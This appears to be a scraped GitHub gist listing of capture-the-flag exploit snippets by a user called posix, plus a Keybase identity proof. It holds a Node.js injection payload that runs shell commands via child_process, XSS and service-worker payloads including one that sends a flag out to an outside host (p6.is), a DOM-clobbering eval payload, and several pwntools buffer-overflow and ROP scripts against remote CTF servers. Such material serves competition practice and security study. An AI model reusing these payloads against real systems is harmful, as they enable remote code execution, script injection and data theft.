'+constructor.constructor("return process")().mainModule.require("child_process").execSync('cat * | grep CSR')+' CSR{r363x_15_fun_r363x_15_l0v3}
Posix po6ix
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <iframe srcdoc="<form action="https://amazingnotes.asisctf.com:444/" method="POST" id=x> | |
| <input name=ext value=es> | |
| <textarea name=note> | |
| self.addEventListener("fetch", function(event) { | |
| if(event.request.url.indexOf("flag") != -1) | |
| return; | |
| event.respondWith(new Response(` | |
| <img src=//p6.is/givemeflag> | |
| <script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <a id=context><iframe id=context name=apiPublicKey href="x"></iframe><iframe id=context name=auth href="x" b=y></iframe><iframe id=context name=disqusUrl href="x"></iframe></a> | |
| <div id="account-nav"></div><div id="anon-account-nav-tmpl">${eval(atob(`YWxlcnQob3JpZ2luKQ`))}</div> | |
| * repeat below if you want to improve the reliability | |
| ```mermaid | |
| graph LR; | |
| A-->B; | |
| click B callback "<script src=https://a.disquscdn.com/1608164631/build/js/abadd50d331d.js></script><script src=https://a.disquscdn.com/1608164631/js/src/global.js></script>" | |
| ``` |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| # p = process('./game') | |
| p = remote('cop.ichsa.ctf.today', 8011) | |
| for i in range(0x90): | |
| p.sendlineafter('Please chose an option', '2') | |
| p.sendlineafter('Please chose an option', '2') | |
| payload = b'aaaaaa' + p64(0x401813)*16 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| p = remote('20.42.99.115', 3000) | |
| payload = b'\1'*150 | |
| p.sendline(payload) | |
| p.interactive() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context.log_level = 'debug' | |
| # p = process('./qemu-aarch64 -L . -g 1234 ./vuln'.split(' ')) | |
| p = remote('pwn.zh3r0.cf', 1111) | |
| e = ELF('./vuln') | |
| p.send('a'*8) | |
| p.recvuntil('a'*8) |
I hereby claim:
- I am posix-lee on github.
- I am posix (https://keybase.io/posix) on keybase.
- I have a public key whose fingerprint is 8A8E 554E 754D BD83 79F8 9A4A 6DE9 FFC9 30A8 4F20
To claim this, I am signing this object:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from ctypes import * | |
| from time import sleep | |
| context.log_level = 'debug' | |
| rlibc = CDLL('./libc.so') | |
| rlibc.srand(rlibc.time(0)) | |
| # p = process('./chall') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| # p = process('./ap-abcs') | |
| p = remote('bin.bcactf.com', 49154) | |
| payload = b'\0'*(0x50-0x4) | |
| payload += p32(0x73434241) | |
| p.sendline(payload) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| # p = process('./chall') | |
| p = remote('35.224.135.84', 1001) | |
| p.sendlineafter('>', '1') | |
| pie_leak = int(p.recvline()[40:-3], 16) | |
| pie_base = pie_leak - 0x1390 | |
| print(hex(pie_leak)) |